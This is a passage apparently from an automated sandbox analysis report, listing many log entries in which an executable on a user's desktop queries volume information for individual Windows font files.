            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
